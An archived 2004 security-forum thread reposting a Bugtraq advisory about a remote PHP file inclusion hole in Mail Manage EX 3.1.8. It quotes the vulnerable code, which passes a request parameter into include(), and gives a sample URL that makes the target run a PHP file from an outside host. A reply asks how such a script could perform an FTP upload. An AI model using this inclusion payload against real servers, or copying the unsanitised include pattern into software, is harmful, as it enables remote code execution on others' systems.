Php Include Exploit In Mail Manage

Full Version: Php Include Exploit In Mail Manage

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jun 3 2004, 11:23 PM

QUOTE

Description: PHP Include Exploit in Mail Manage EX v3.1.8
Compromise: a malicious PHP script from an external host may be included and
executed.
Vulnerable Systems: all system using mmex.php v3.1.8 and maybe lower (not
tested).
Details:
The PHP Include exploit exist in de folowing code,

mmex.php--SNIP----->
#===========================================================
# Register Globals
#===========================================================

$Settings = $_REQUEST['Settings'];
$Refresh = $_REQUEST['Refresh'];
$FormRecipient = $_REQUEST['Recipient'];
$EMAIL[0] = $_REQUEST['email'];
$EMAIL[1] = $_REQUEST['Email'];
$EMAIL[2] = $_REQUEST['E_mail'];
$EMAIL[3] = $_REQUEST['e_mail'];
$EMAIL[4] = $_REQUEST['email_address'];
$EMAIL[5] = $_REQUEST['Email_Address'];
$EMAIL[6] = $_REQUEST['Email_address'];

#===========================================================
# CHECK SETTINGS & FORM RECIPIENT
#===========================================================
if(!$Settings)
exit ("<b>No settings were found for this form.</b>");

$Include = @include($Settings);
if (!$Include)
exit ("<b>Incorrect settings filename in your form or specified file does
not exist.</b>");
mmex.php---EOF----->

"$Settings" can be used to Include malicious PHP code.

How to exploit this bug?

http://www.target.com/mail/mmex.php?Seting...b0x/malicious.p
hp

malicious.php is executed by the target.

Solution:
No solution provided.
Gregg Kenneth Jewell of "Mail Manage EX" is informed.

Greetings,

Jan van de Rijt aka The Warlock.

Source: http://seclists.org/lists/bugtraq/2004/Jun/0042.html

BuzzDee

Jun 4 2004, 07:35 AM

hmmm how should a php-script look like that it executes an ftp upload script? dunno much about php :S

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.